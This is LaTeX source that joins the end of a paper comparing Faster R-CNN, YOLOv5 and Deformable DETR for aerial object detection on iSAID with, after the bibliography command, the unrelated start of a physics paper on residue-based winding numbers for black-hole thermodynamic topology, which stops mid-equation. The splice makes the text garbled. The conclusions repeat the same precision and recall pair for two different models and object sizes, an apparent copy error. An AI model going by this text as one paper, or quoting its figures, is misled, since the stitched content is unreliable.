To further verify the impact of the modifications, we have performed an ablation study and report the results on the iSAID validation set as shown in Fig \ref{fig:det2 ablation}. It can be observed that incrementally adding each modification resulted in better performance indicated by mAP.
The introduction of the weighted FPN with channel attention considerably improved the mAP, indicating that using information from higher-resolution layers is favorable when dealing with objects of different scales. We found that using small weights was beneficial; empirically, we set $wt_1$=1.5, $wt_2$=2, $wt_3$=2.5, $wt_4$=3.\\
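The per-level weighting alone can be sketched as follows (a minimal numpy sketch with hypothetical feature maps; the channel-attention branch is omitted for brevity):

```python
import numpy as np

# Hypothetical FPN outputs P2-P5 as (channels, height, width) arrays.
rng = np.random.default_rng(0)
levels = [rng.standard_normal((256, s, s)) for s in (64, 32, 16, 8)]
weights = [1.5, 2.0, 2.5, 3.0]  # wt_1 ... wt_4 from the ablation above

def weight_levels(levels, weights):
    """Scale each pyramid level by its scalar weight before it reaches the heads."""
    return [w * f for w, f in zip(weights, levels)]

weighted = weight_levels(levels, weights)
```

Lower-resolution levels receive the larger weights here, matching the setting above.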
Adding the class-balanced sampler in the RoI head further improved performance by 0.5 mAP. During training, we ensure that proposals are selected in a balanced way from each group, thus reducing the possibility of bias towards a subset of classes. We choose 256 proposals in the RoI head, of which 25\% (64) are usually considered foreground; we ensure that 24 foreground proposals are selected from the rare classes and 20 each from the common and frequent classes.\\
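A simplified sketch of this quota-based sampling (the grouping of classes into rare/common/frequent is taken as given; the helper names are ours):

```python
import random

# Foreground quota per class-frequency group: 24 + 20 + 20 = 64 proposals.
QUOTA = {"rare": 24, "common": 20, "frequent": 20}

def sample_balanced(proposals_by_group, quota=QUOTA, seed=0):
    """Draw foreground proposals with a fixed quota from each frequency group."""
    rng = random.Random(seed)
    picked = []
    for group, n in quota.items():
        pool = proposals_by_group.get(group, [])
        picked += rng.sample(pool, min(n, len(pool)))
    return picked
```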
Introducing the density prediction head also increased the mAP, with the effect more pronounced for small objects. This affirms that having knowledge of the context/density around an instance can be very useful, especially for small objects.
All experiments were carried out with the following settings: batch size of 2, learning rate of 0.0025, momentum of 0.9, weight decay of 0.0001, and $\gamma = 0.1$, run for 100,000 iterations.
\begin{figure}[!ht]
\centering
\includegraphics[width=1.1\linewidth]{Images/det2_ablation.png}
\caption{Faster R-CNN modifications ablation study, results on validation set}
\label{fig:det2 ablation}
\end{figure}
\subsection{YOLOv5}
In order to work with the dataset, we had to perform some preprocessing steps:
\subsubsection{Preprocessing: COCO JSON to YOLO TXT}
Datasets for visual tasks such as object detection or segmentation consist of images and their metadata. The metadata file includes label information for each image, with bounding-box annotations specifying the location of each category instance found in every image. A widely used format is the MS COCO format \cite{10.1007/978-3-319-10602-1_48}. iSAID metadata is provided in COCO JSON format; for YOLO, however, it had to be converted into TXT format, with the information related to each image stored in a separate text file titled with the respective image name.
For generating an output JSON file, a JavaScript snippet was used, which reads each image's name in the directory and replaces it with its entry id number.
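The bounding-box arithmetic of this conversion can be sketched as follows (a minimal sketch; the helper names are ours, not the exact script used):

```python
def coco_to_yolo(bbox, img_w, img_h):
    """COCO [x_min, y_min, width, height] in pixels -> YOLO [cx, cy, w, h] in [0, 1]."""
    x, y, w, h = bbox
    return [(x + w / 2) / img_w, (y + h / 2) / img_h, w / img_w, h / img_h]

def yolo_line(class_id, bbox, img_w, img_h):
    """One line of the per-image TXT file: 'class cx cy w h'."""
    return " ".join(str(v) for v in [class_id] + coco_to_yolo(bbox, img_w, img_h))
```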
\subsubsection{Preprocessing: Background Images Reduction}
In YOLO, unlabelled images are used as background images during training to reduce false positives and balance the weights, unlike other models, which neglect such images. An experiment was carried out to identify what percentage of background images would yield the highest accuracy and the shortest training time. Table \ref{tab:table100} shows the numbers of labelled/unlabelled images in the training/validation sets of the given iSAID dataset. When YOLOv5L was trained at a resolution of 640 with a batch size of 16, one epoch at full scale required 31 minutes; when background images were removed entirely, training only on labelled images, it took 6.24 minutes per epoch. Moreover, as shown in Table \ref{tab:table101}, three models were trained on the full-scale set, on labelled + 10\% unlabelled, and on labelled images only, with the latter achieving the highest accuracy and the fastest training time.
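The filtering step itself is simple; a sketch of keeping every labelled image plus a chosen fraction of backgrounds (function name and seed are ours):

```python
import random

def reduce_backgrounds(labelled, unlabelled, keep_fraction=0.1, seed=0):
    """Keep all labelled images and a random fraction of background images."""
    rng = random.Random(seed)
    n_keep = int(round(keep_fraction * len(unlabelled)))
    return labelled + rng.sample(unlabelled, n_keep)
```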
\begin{table}[h]
\footnotesize
\centering
\begin{tabular}{| c | c | c |}
\hline
\textbf{iSAID} & \textbf{Unlabelled} & \textbf{Labelled}\\
\hline
Training Set & 67703 & 16384 \\
\hline
Validation Set & 22487 & 6049 \\
\hline
\end{tabular}
\caption{Comparison table between labelled and unlabelled images.}
\label{tab:table100}
\end{table}
\begin{table}[h]
\footnotesize
\centering
\begin{tabular}{| c | c | c | c |}
\hline
\textbf{Images} & \textbf{Training time} & \textbf{Epochs} & \textbf{mAP@.5:.95}\\
\hline
84087 & 179m & 5 & 0.3314 \\
\hline
18018 & 43m & 5 & 0.3448 \\
\hline
16384 & 40m & 5 & \textbf{0.3811} \\
\hline
\end{tabular}
\caption{Model performance comparison based on background image percentage.}
\label{tab:table101}
\end{table}
We also experimented with the $\alpha$ and $\gamma$ parameters of the focal loss function. The best results can be seen in Table \ref{tab:table102}.
\begin{table}[h]
\footnotesize
\centering
\begin{tabular}{| c | c | c | c |}
\hline
\textbf{$\gamma$} & \textbf{$\alpha$} & \textbf{mAP@.5} & \textbf{mAP@.5:.95}\\
\hline
1.5 & 0.25 & 0.685 & 0.466 \\
\hline
2.0 & 0.25 & 0.689 & 0.469 \\
\hline
\end{tabular}
\caption{Focal loss}
\label{tab:table102}
\end{table}
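For reference, the per-example binary focal loss with these $(\gamma, \alpha)$ values can be sketched as follows (a minimal sketch, not the exact YOLOv5 implementation):

```python
import math

def focal_loss(p, y, alpha=0.25, gamma=2.0):
    """FL(p_t) = -alpha_t * (1 - p_t)**gamma * log(p_t) for one prediction.

    p is the predicted probability of the positive class; y is the 0/1 label.
    """
    p_t = p if y == 1 else 1.0 - p
    a_t = alpha if y == 1 else 1.0 - alpha
    return -a_t * (1.0 - p_t) ** gamma * math.log(p_t)
```

With $\gamma=0$ and $\alpha_t=1$ this reduces to the ordinary cross-entropy; increasing $\gamma$ down-weights well-classified examples.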
The YOLOv5 Large architecture (normal), the focal-loss-modified, and the FPN-modified models were run on iSAID's validation set at a resolution of 640, a batch size of 16, and 50 epochs; the results are presented in Fig. \ref{fig:yolo}. In terms of precision and mAP@.5:.95, YOLOv5L scored the highest compared to the other models. In terms of mAP@.5, the focal-loss-modified model showed better performance, while the FPN-modified model scored lowest on all evaluation metrics. The YOLOv5 architecture is highly optimized for object detection tasks and receives consistent updates in its repository.
\begin{figure}[!ht]
\centering
\includegraphics[width=1.1\linewidth]{Images/yolo.png}
\caption{Results for validation set using YOLOv5}
\label{fig:yolo}
\end{figure}
\subsection{Deformable DETR}
At the moment, owing to the recency of the detection transformer, it has mainly been tested on popular, well-studied, and relatively balanced object detection datasets, such as MS COCO \cite{lin2015microsoft}, Pascal \cite{mottaghi_cvpr14}, etc.
In this subsection, we explore the performance of the Deformable DETR and its variations on the iSAID dataset.
Unless another setup is explicitly mentioned, due to the limited time and available computing resources, the following models were trained with these hyper-parameters: batch size of 6, 15 epochs, learning rate of 2e-4 for the encoder-decoder, learning rate of 2e-5 for the backbone, and learning rate decay by a 0.5 multiplier at every 7th epoch for the encoder-decoder and the fully connected classifiers. On average, training with these parameters takes approximately 18-25 hours, depending on the architecture.
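The step schedule above can be written compactly (a sketch; the base rate is 2e-4 for the encoder-decoder and 2e-5 for the backbone):

```python
def lr_at(epoch, base_lr=2e-4, decay=0.5, step=7):
    """Learning rate after `epoch` epochs under a step-decay schedule."""
    return base_lr * decay ** (epoch // step)
```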
\textbf{Single-Scaled attention:}
First, as a baseline, we chose the single-scaled Deformable DETR model described in the original paper. It uses an ImageNet pre-trained ResNet-50 convolutional neural network as a backbone for feature extraction. The features extracted from the last convolutional layer, of size $7\times7\times2048$, are used as the input for the encoder-decoder transformer.
Even this simplified architecture shows decent performance, with an mAP value of $0.303$, which is quite close to the Faster R-CNN baseline model. Taking into account that the model is trained from scratch for only 15 epochs, we suggest that it would be able to reach satisfactory results given a longer training time.
\textbf{Multi-Scaled attention:}
Next, in order to confirm the suggestion made in \cite{zhu2021deformable} regarding the performance improvement for small and medium-sized objects when a multi-scaled attention module is used, we also trained this model from scratch.
The multi-scaled encoder transformer module uses the ordinary Conv3-5 layers from the CNN backbone, together with the Conv5 layer with a stride of 2 applied. The feature channels of all levels are projected to 256 so that the inputs have the same size before being fed to the encoder transformer. The architecture of this module is shown in Fig. \ref{fig:multi-scaled}.
\begin{figure}[!ht]
\centering
\includegraphics[width=\linewidth]{Images/Dmitry/3.2_Multi.png}
\caption{Image feature maps, extracted with a CNN backbone are inputs for a multi-scaled attention module (encoder part); the architecture proposed by \cite{zhu2021deformable}}
\label{fig:multi-scaled}
\end{figure}
From the obtained results, one can observe that the mAP for small and medium objects indeed increased by 20 \% compared to the single-scaled architecture. This can be explained by the fact that the iSAID dataset contains many more objects of these sizes than larger ones.
Since this architecture uses considerably more memory to store image features, the batch size was decreased to 4.
\textbf{ResNet-101 Backbone:}
Another improvement we experimented with is changing the CNN backbone to a larger one, ResNet-101. Although this was not noticeably useful on the usual datasets such as COCO and ImageNet, where medium objects typically still cover a significant part of the image frame, we assume that for the iSAID dataset, with its larger image resolution, it may help to identify medium instances better. We also expect a certain minor performance increase for the small and large objects, but since the architectures of ResNet-50 and ResNet-101 differ only in the depth of the Conv3 layer, we assume that the effect should mostly concern the medium ones.
Our experimental observations support this assumption: in the single-scale version, the accuracy indeed increased by 20 \% for the middle-sized instances and only by 7-9 \% for the rest; in the multi-scale attention architecture, the increase is 10 \% for medium objects and nearly 3 \% for the rest.
\textbf{Early backbone layers:}
As the next modification, we decided to use earlier layers of the CNN backbone. We suggest that implementing this idea may increase the performance for tiny, small, and medium objects. After resizing and passing through the first layers, the receptive field of the backbone is certainly smaller than at the later layers. Therefore, we suggest that by the moment of reaching the Conv3 layer, instances with an original resolution smaller than $22\times22$ are almost impossible to classify, since they shrink to a nearly $1\times1$ feature pixel by that layer. This might also explain the fact that the accuracy for small objects is relatively low in the ordinary Deformable DETR approach considered above.
\begin{figure}[!ht]
\centering
\includegraphics[width=\linewidth]{Images/Dmitry/3.3_1layer.png}
\caption{Modified encoder input architecture, connected with the backbone. The outputs of the Conv2-5 convolutional layers, projected to 256 channels, are used as inputs for the encoder part of the multi-scaled attention module.}
\label{fig:1layer}
\end{figure}
The modified encoder input architecture, shown in Fig. \ref{fig:1layer}, now includes the Conv2-5 backbone layers, omitting the extra stride-2 Conv5 layer applied previously. Since the added Conv2 layer is significantly larger than the removed layer, the resulting model requires more GPU memory during training. Having limited computing resources, we decided to decrease the batch size to 2, which significantly increased the training time from 0.8 hours to 3 hours per epoch.\\
\textbf{Optimised model:}
Finally, the best-performing model we were able to achieve is a combination of the previously mentioned modifications to Deformable DETR: it includes the multi-scale attention module and ResNet-101 as the CNN backbone, with its earlier layers taken as well.
More specifically, the model was trained with these hyper-parameters: batch size of 6, 80 epochs, encoder-decoder learning rate of 2e-4, backbone learning rate of 2e-5, learning rate decay by 0.5 at every 7th epoch, and the loss function coefficients optimised for fine-tuning (decreased by 50 \%).
\begin{figure}[!ht]
\centering
\includegraphics[width=\linewidth]{Images/Dmitry/3.5_Final.png}
\caption{Results on the validation set using different modifications of Deformable DETR. The results for models denoted as '-1 layer' are extrapolated values expected after training for 30 epochs; the extrapolation is based on thorough observations of similar models fully trained for 80 epochs.}
\label{fig:detr_final}
\end{figure}
\section{Conclusions}
Having investigated the conducted experiments with both original and modified architectures and summarised the different performance metrics observed for all three considered approaches, we can provide a model-based conclusion for each of them, mentioning their successes and failures.
Starting with Faster R-CNN, we noticed that this architecture shows good precision and recall values on small objects and outstanding results on medium-sized ones [$P_m: 0.476, R_m:0.684$] (harbor, storage tank, bridge); however, it performs quite badly on large ones [$P_l: 0.19$].
Next, YOLOv5, in turn, demonstrates the best precision on small objects [$P_s: 0.46$] (helicopter, large vehicle, baseball diamond) and good values for the medium-sized ones, but unacceptably low precision and recall for the large ones [$P_l: 0.13, R_l: 0.25$].
And finally, the attention-based Deformable DETR shows superior performance indicators for large objects [$P_l: 0.476, R_l:0.684$] and good values for the medium-sized ones, while performing worse on the small ones [$P_s: 0.22, R_s: 0.32$].
To conclude, aerial object detection is certainly a challenging task, posing multiple complex questions. Through our experiments, we tried to analyse the strengths and weaknesses of different types of detectors on aerial images from the iSAID dataset. The observed variety of outcomes and model performance shows that the object detection problem can already be solved adequately by highly dataset-dependent solutions, but there is still no single approach that provides a general solution for every case.
{\small
\bibliographystyle{ieee}
\section{Introduction}
The topological defect is a universal pattern of nature and plays a fundamental role in providing stability information against perturbations for systems ranging from liquid crystals to particle physics \cite{Fumeron:2022gcd}. The study of topological properties in strong gravity systems, beyond quantum many-body systems, can be traced back to \cite{Cunha:2017qtt,Cunha:2020azh,Guo:2020qwk}, where the existence of at least one light ring around a four-dimensional stationary non-extremal rotating black hole was proved. Recently, exploring the thermodynamics of black holes via topological properties has charted a way to deepen our understanding of the intrinsic characteristics of spacetime \cite{Wei:2021vdx,Yerra:2022alz,Fan:2022bsq}. The topological approach has the merit of neglecting the details of objects and concerning itself only with their generic properties. To investigate the thermodynamic topological properties of black holes as solutions of the Einstein gravitational field equation, one has to identify the solutions as topological thermodynamic defects in the thermodynamic parameter space, which can be constructed in the generalized off-shell free energy landscape \cite{Wei:2022dzw}.
In the standard definition of free energy, the Hawking temperature is invariant for a canonical ensemble containing black hole states with various radii. The generalized concept of free energy was raised in Ref. \cite{York:1986it} and was recently used to study the thermodynamics of the five-dimensional Schwarzschild black hole in Ref. \cite{Andre:2020czm}. In the generalized free energy landscape, a canonical ensemble containing different black hole states characterized by their horizon radii is endowed with an ensemble temperature fluctuating around the Hawking temperature. As a result, one has on-shell free energy states when the ensemble temperature equals the Hawking temperature and off-shell free energy states when it deviates from the Hawking temperature; the former saturate the Einstein field equation, whilst the latter violate it \cite{Liu:2022aqt}. Notice, however, that the extremal points of the free energy recover the on-shell states, as the thermodynamic first law of the black hole is satisfied there. Locally, a minimum (maximum) point of the free energy landscape corresponds to a stable (unstable) thermodynamic state of the black hole, as the specific heat there is positive (negative); globally, a thermodynamically stable black hole occupies a minimal point of the landscape \cite{Hawking:1982dh,Kubiznak:2012wp}. Research along this line includes Ref. \cite{Li:2022oup}, which proposed a generalized free energy landscape for Anti-de Sitter (AdS) black holes, and Refs. \cite{Li:2020khm,Li:2020nsy,Liu:2021lmr} on the dynamical phase transition of spherically symmetric black holes.
The aim of this paper is to propose an alternative way to investigate the thermodynamic topologies of black holes beyond the topological current method. In \cite{Wei:2022dzw}, Duan's topological current method was introduced to calculate the winding numbers and topological numbers of black holes as thermodynamic defects in the generalized free energy landscape. We observe that these winding numbers and topological numbers can instead be calculated by employing the residues at the singular points of a characterized complex function constructed from the off-shell free energy. The residue method recovers the results obtained by the topological current method; interestingly, it can also be used to discern generation, annihilation, and critical points. We arrange the paper as follows. In Sec. \ref{sec:gen}, we briefly review the generalized free energy landscape and introduce the residue method for investigating the local and global topological properties of black hole solutions. In Sec. \ref{sec:ttbh}, we apply the residue method to study the topological properties of Schwarzschild black holes, Reissner-Nordström (RN) black holes, RN-AdS black holes, and black holes in non-linear electrodynamics. Sec. \ref{sec:con} is devoted to our closing remarks.
\section{Generalized landscape of free energy}\label{sec:gen}
We shall take the partition function $\mathcal{Z}$ using the first-order Euclidean action $\mathcal{I}$ including a subtraction term \cite{Gibbons:1976ue},
\begin{equation}
\mathcal{Z}(\beta)=e^{-\beta F}=\int D[g] e^{-\frac{\mathcal{I}}{\hbar}} \sim e^{-\frac{\mathcal{I}}{\hbar}},
\end{equation}
where the Euclidean gravitational action $\mathcal{I}$ reads \cite{Li:2022oup}
\begin{equation}
\mathcal{I}=\mathcal{I}_1-\mathcal{I}_{\text {subtract }}=-\frac{1}{16 \pi} \int \sqrt{g} R d^4 x+\frac{1}{8 \pi} \oint \sqrt{\gamma} K d^3 x+\mathcal{I}_{\textrm{matt}}-\mathcal{I}_{\text {subtract }}.
\end{equation}
$\beta$ is the inverse of temperature or Euclidean time period, $K$ is the trace of extrinsic curvature tensor defined on the boundary with an induced metric $\gamma_{ij}$ and the determinant of this metric is $\gamma$. We use the saddle point approximation (semi-classical approximation) which allows us to evaluate the partition function on the Euclidean fluctuating black hole with fixed event horizon radius $r_+$ (which is the order parameter) and fixed ensemble temperature $T=\beta^{-1}$ (which is the temperature of the thermal environment and thus independent of the order parameter $r_+$ and adjustable). $\mathcal{I}_{\textrm{matt}}$ stands for the contribution from matter like the electromagnetic field. For the asymptotically AdS spacetime, the partition function can be evaluated just via the Einstein-Hilbert action
\begin{equation}
\mathcal{I}_E=-\frac{1}{16 \pi} \int\left(R+\frac{6}{L^2}\right) \sqrt{g} d^4 x+\mathcal{I}_{\textrm{matt}}
\end{equation}
on the Euclidean gravitational instanton with the conical singularity \cite{Li:2022oup}, where $L$ is the AdS radius. The spacetime solution of the action turns asymptotically flat from AdS in the limit $L\to\infty$.
The thermodynamic energy and entropy of the system are respectively
\begin{equation}
E=\partial_\beta \mathcal{I},
\end{equation}
\begin{equation}
S=\left(\beta \partial_\beta \mathcal{I}-\mathcal{I}\right).
\end{equation}
Then the generalized free energy of the system can be defined as
\begin{equation}
\mathcal{F}=E-\frac{S}{\tau},
\end{equation}
where the parameter $\tau$ owns the same dimension with the ensemble temperature $T$. Note that for the AdS black hole the thermodynamic energy $E$ is in fact the enthalpy $H$ \cite{Kubiznak:2016qmn,Kastor:2009wy,Chamblin:1999tk}. The on-shell free energy landscape is that
\begin{equation}
\tau=\frac{1}{T},
\end{equation}
which renders that the black hole solution satisfies the Einstein equation
\begin{equation}\label{eineq}
\mathcal{E}_{\mu \nu} \equiv G_{\mu \nu}-\frac{8 \pi G}{c^4} T_{\mu \nu}=0,
\end{equation}
where $G_{\mu\nu}$ is the Einstein tensor of the spacetime background geometry, $T_{\mu\nu}$ is the energy-momentum tensor of matter. In the off-shell landscape where the field equation is violated, $\tau$ deviates from $T^{-1}$, which means that the temperature of the canonical ensemble fluctuates.
As pointed out in \cite{Wei:2022dzw}, at the point $\tau=1/T$, we have
\begin{equation}\label{dep}
\frac{\partial \mathcal{F}}{\partial r_{\mathrm{h}}}=0.
\end{equation}
Then a vector field $\phi$ is constructed there as \footnote{We also have $$\frac{\partial \mathcal{F}}{\partial S}=0,$$ so we can also construct a vector field as $$\phi=\left(\frac{\partial \mathcal{F}}{\partial S},-\cot \Theta \csc \Theta\right).$$}
\begin{equation}\label{phid}
\phi=\left(\frac{\partial \mathcal{F}}{\partial r_{\mathrm{h}}},-\cot \Theta \csc \Theta\right),
\end{equation}
where $0 \leq \Theta \leq \pi$ is an additionally introduced parameter. Then, using Duan's $\phi$-mapping topological current theory \cite{Duan:2018oup}, the local winding number of the topological defects at the points $\tau=1/T$ can be calculated, and the global topological number of the black hole solution is obtained in \cite{Wei:2022dzw} by adding the winding numbers of all defects. We can see that to do this calculation, an extension of the dimension of the parameter space is needed, and one should choose an auxiliary parameter $\Theta$ to construct the function $-\cot \Theta \csc \Theta$. In principle, the selection of this function can be arbitrary; the quintessential ingredient is to construct a plane so that a real contour can be introduced to enclose the thermodynamic defects defined by Eq. (\ref{dep}).
This is reminiscent of the contour integral of a complex function $\mathcal{R}(z)$ which is analytic except at a finite number of isolated singular points $z_1, z_2, \ldots, z_m$ interior to $C$ which is a positively oriented simple closed contour. The complex function is defined within and on the contour $C$. According to the residue theorem,
\begin{equation}
\oint_C \frac{\mathcal{R}(z)}{2\pi i} d z= \sum_{k=1}^m \operatorname{Res}\left[\mathcal{R}\left(z_k\right)\right].
\end{equation}
Inspired by this, we first solve $\partial_{r_h}\mathcal{F}=0$
and obtain
\begin{equation}
\tau=\mathcal{G}(r_h),
\end{equation}
then we define a characterized complex function $\mathcal{R}(z)$ related with the generalized free energy,
\begin{equation}\label{cf}
\mathcal{R}(z)\equiv\frac{1}{\tau-\mathcal{G}(z)},
\end{equation}
where we substitute the real variable $r_h$, {\it i.e.}, the event horizon radius, with a complex variable $z$. This means that we have extended the domain to the complex plane $\mathbb{C}$, with $z=x+ i y$, $x, y\in \mathbb{R}$. We will see that the defect points previously defined by $\phi=0$ [cf. (\ref{phid})] on the real plane now turn into isolated singular points of the characterized complex function $\mathcal{R}(z)$ on the complex plane.
Then, as shown in Fig. \ref{fig1x}, every real singular point, being a thermodynamic defect, can be endowed with an arbitrary contour $C_i$ enclosing it (and no other singular point). The complex function $\mathcal{R}(z)$ is analytic on and within the contour $C_i$ except at the singular point, so we can use the residue theorem to calculate the integral of $\mathcal{R}(z)$ along the path $C_i$ enclosing $z_i$; and according to the Cauchy-Goursat theorem [see (\ref{caug}) below], the integral of $\mathcal{R}(z)/2\pi i$ along the contour $C$ winding around the singular points is equivalent to the sum of the integrals along the interior contours $C_i$ enclosing the $z_i$.
\begin{figure}[htpb!]
\begin{center}
\includegraphics[width=5.3in,angle=0]{con.pdf}
\end{center}
\vspace{-5mm}
\caption {A schematic diagram showing the contour integral of a function which is analytic except at finite isolated singular points $z_i$ along paths $C$ and $C_i$.}\label{fig1x}
\end{figure}
This inspires us to reflect the winding number by using the residue of the complex function $\mathcal{R}(z)$ at its pole point, which is at the same time the topological defect corresponding to an on-shell black hole solution. To extract the information of the topology for the local defect point, we just need to normalize the residue, obtaining the winding number $w_i$ of a singular point $z_i$ as
\begin{equation}\label{wind}
w_i =\frac{\textrm{Res}\mathcal{R}(z_i)}{|\textrm{Res}\mathcal{R}(z_i)|}=\textrm{Sgn}[\textrm{Res}\mathcal{R}(z_i)],
\end{equation}
where $|\,|$ denotes the absolute value, and $\textrm{Sgn}(x)$ stands for the sign function, which returns the sign of a real number and gives $0$ if $x=0$. Here we should point out that since the singular points we care about are real, we have $\textrm{Res}\mathcal{R}(z_i)\in\mathbb{R}$. Then the global topological number $W$ of the black hole spacetime can be obtained as
\begin{equation}\label{topw}
W=\sum_i w_i.
\end{equation}
This can be explained by applying the Cauchy-Goursat theorem, which allows an integral of the complex function around an exterior contour to be broken up into integrals over simple closed interior contours enclosing the singular points. So for the case shown in Fig. \ref{fig1x}, we have
\begin{equation}\label{caug}
\oint_C \mathcal{R}(z) d z= \sum_i \oint_{C_i} \mathcal{R}(z) d z.
\end{equation}
Calculating the winding number for the thermodynamic defects through residues enables us to deal with different kinds of isolated singular points and to discern them. In particular, it makes it possible to calculate the winding number of a pole of order higher than one, which may be a generation point, annihilation point, or critical point. To see how this works, we will exemplify it in what follows by calculating the thermodynamic topologies of typical black hole solutions of the Einstein equations (\ref{eineq}).
\section{Thermodynamic topologies of black holes}\label{sec:ttbh}
\subsection{Schwarzschild black hole}
We set the four-space metric as
\begin{equation}\label{met}
d s^2={-f(r) d t^2+ \frac{d r^2}{f(r)} } +r^2 d \theta^2+r^2 \sin ^2 \theta d \phi^2 .
\end{equation}
For a Schwarzschild black hole, $f(r)=1-\frac{2M}{r}$. The event horizon is at $r_h=2M$. The thermodynamic energy and entropy of the system are respectively
\begin{equation}
E=M,
\end{equation}
\begin{equation}
S=4 \pi M^2.
\end{equation}
For the Schwarzschild black hole, according to the definition (\ref{cf}), we can explicitly obtain a characterized rational complex function
\begin{equation}
\mathcal{R}_S(z)=\frac{1}{\tau-4\pi z},
\end{equation}
which is analytic away from a single isolated simple pole (a pole of order one) located at
\begin{equation}
z_1=\frac{\tau}{4\pi}.
\end{equation}
According to the residue theorem, if we choose a contour $C_1$ around the pole $z_1$ [cf. Fig. \ref{fig1x}], then we will have
\begin{equation}
\textrm{Res}\mathcal{R}_S (z_1)=-\frac{1}{4\pi},
\end{equation}
which is non-zero. Otherwise, if we choose another contour, say $C_2$ which does not enclose $z_1$ in Fig. \ref{fig1x}, we will obtain
\begin{equation}
\oint_{C_2} \frac{\mathcal{R}_S(z)}{2\pi i} d z= 0.
\end{equation}
Since the residue is negative, according to Eqs. (\ref{wind}) and (\ref{topw}), we have
\begin{equation}
w_1=-1,\quad W=-1
\end{equation}
for the Schwarzschild black hole solution.
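This residue is easily verified symbolically, e.g.\ with sympy (a verification sketch, not part of the derivation):

```python
import sympy as sp

z, tau = sp.symbols("z tau", positive=True)
R_S = 1 / (tau - 4 * sp.pi * z)   # characterized function for Schwarzschild
pole = tau / (4 * sp.pi)          # its only (simple) pole
res = sp.residue(R_S, z, pole)    # gives -1/(4*pi), independent of tau
```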
\subsection{Reissner-Nordström black hole}
For the Reissner-Nordström (RN) black hole, we have
\begin{equation}
f(r)=1-\frac{2M}{r}+\frac{Q^2}{r^2}
\end{equation}
in the metric (\ref{met}), where $Q$ is the electric charge. The generalized off-shell free energy of the system is
\begin{equation}\label{frn}
\mathcal{F}=\frac{ r_h^2+ Q^2}{2 r_h}-\frac{\pi r_h^2}{\tau }.
\end{equation}
According to the definition (\ref{cf}), the characterized rational complex function can be written as
\begin{equation}\label{rrn}
\mathcal{R}_{RN}(z)=\frac{Q^2-z^2}{\tau \left(Q^2-z^2\right)+4 \pi z^3}.
\end{equation}
Applying the fundamental theorem of algebra,\footnote{Any polynomial
$$
p(x)=a_0+a_1 x+\cdots+a_n x^n, \quad a_n \neq 0
$$
can be factored completely as
$$
p(x)=a_n\left(x-z_1\right)\left(x-z_2\right) \cdots\left(x-z_n\right),
$$
where the $z_i$ are roots (which may be complex or real).}
we can write Eq. (\ref{rrn}) as
\begin{equation}
\mathcal{R}_{RN}(z)=\frac{Q^2-z^2}{4\pi (z-z_1)(z-z_2)(z-z_3)}.
\end{equation}
Root analysis shows that, for $0<\tau<6\sqrt{3}\pi Q$, there is only one real root, which is negative, say $z_3$, so the on-shell condition cannot be satisfied. For $\tau>6\sqrt{3}\pi Q$, we have \footnote{For $\tau\gg 1$, $z_1/Q\to 1^+$ and $z_1\ll z_2$. The extremal RN black hole corresponds to the limit $\tau\to\infty$. Note that the condition $z_1>Q$ is important for the calculation of the residue.}
\begin{equation}
0<z_1<z_2\in\mathbb{R},\, \textrm{and}\,\, 0>z_3\in\mathbb{R}.
\end{equation}
Then according to the definition of the winding number Eq. (\ref{wind}), we have
\begin{equation}\label{rnr3}
w_1=1,\, w_2=-1.
\end{equation}
Thus according to Eq. (\ref{topw}), the topological number of the RN black hole is
\begin{equation}
W=0.
\end{equation}
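As a numerical illustration with the assumed values $Q=1$ and $\tau=40>6\sqrt{3}\pi Q$, the winding numbers follow from the sign of the residue, which for the rational function $\mathcal{R}_{RN}=N/D$ at a simple pole $z_i$ is the sign of $N(z_i)/D'(z_i)$:

```python
import numpy as np

Q, tau = 1.0, 40.0   # assumed values; tau > 6*sqrt(3)*pi*Q ~ 32.6
# Ascending coefficients of D(z) = tau*(Q^2 - z^2) + 4*pi*z^3 and N(z) = Q^2 - z^2.
D = np.polynomial.Polynomial([tau * Q**2, 0.0, -tau, 4.0 * np.pi])
N = np.polynomial.Polynomial([Q**2, 0.0, -1.0])

def winding(z0):
    """Sign of the residue of N/D at a simple real pole z0."""
    return int(np.sign(N(z0) / D.deriv()(z0)))

poles = sorted(r.real for r in D.roots() if abs(r.imag) < 1e-9 and r.real > 0)
w = [winding(z0) for z0 in poles]   # [+1, -1], so the total W = 0
```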
What we should pay special attention to is the case $\tau=6\sqrt{3}\pi Q$, for which we have
\begin{equation}
0<z_1=z_2\in\mathbb{R},\, \textrm{and}\,\, 0>z_3\in\mathbb{R}.
\end{equation}
So we get a second-order pole of the function $\mathcal{R}_{RN}(z)$, for which we denote as $z_{12}$. Then the characterized function can be explicitly written as
\begin{equation}
\mathcal{R}_{RN}(z)=\frac{Q^2-z^2}{4\pi (z-z_{12})^2 (z-z_3)}.
\end{equation}
$z_{12}$ is a generation point, as has been pointed out in Ref. \cite{Wei:2022dzw}. Here we can also assign a winding number to this special point by calculating the residue of $\mathcal{R}_{RN}(z)$ at this pole of order 2, obtaining
\begin{equation}\label{rnr2}
w_{1,2}=-1.
\end{equation}
This result differs from that of \cite{Wei:2022dzw}, where the winding number of this generation point is $0$. This means that the winding number of the generation point is definition-dependent; the same applies to the annihilation point, as we will see below.
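The winding number of the generation point can also be checked numerically by evaluating the defining contour integral on a small circle around the order-2 pole (with the assumed normalization $Q=1$, the pole sits at $z_{12}=\sqrt{3}\,Q$):

```python
import numpy as np

Q = 1.0
tau = 6 * np.sqrt(3) * np.pi * Q   # generation-point value of tau
R = lambda z: (Q**2 - z**2) / (tau * (Q**2 - z**2) + 4 * np.pi * z**3)

def contour_residue(f, z0, eps=0.5, n=4096):
    """Residue of f at z0 from (1/(2*pi*i)) times the integral over a small circle."""
    theta = 2 * np.pi * np.arange(n) / n
    zs = z0 + eps * np.exp(1j * theta)
    return (eps / n) * np.sum(f(zs) * np.exp(1j * theta))

res = contour_residue(R, np.sqrt(3) * Q)   # order-2 pole; the residue is negative
```

The integral evaluates to $-7/(27\pi)\approx-0.0825$, so $w_{1,2}=\textrm{Sgn}[\textrm{Res}]=-1$, in agreement with Eq. (\ref{rnr2}).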
\subsection{RN-AdS black hole}
For the RN black hole with a negative cosmological constant $\Lambda$, we have the metric function in Eq. (\ref{met}) as
\begin{equation}\label{metads}
f(r)=1-\frac{2M}{r}+\frac{Q^2}{r^2}+\frac{r^2}{L^2},
\end{equation}
where $L$ is the AdS length scale, relating with the negative cosmological constant through a relation $\Lambda=-3/L^2$. The generalized off-shell free energy of the system is
\begin{equation}\label{rrnx}
\mathcal{F}=\frac{-\Lambda r_h^4+3 r_h^2+3 Q^2}{6 r_h}-\frac{\pi r_h^2}{\tau }.
\end{equation}
According to the definition (\ref{cf}), we have the generalized characterized complex function
\begin{equation}
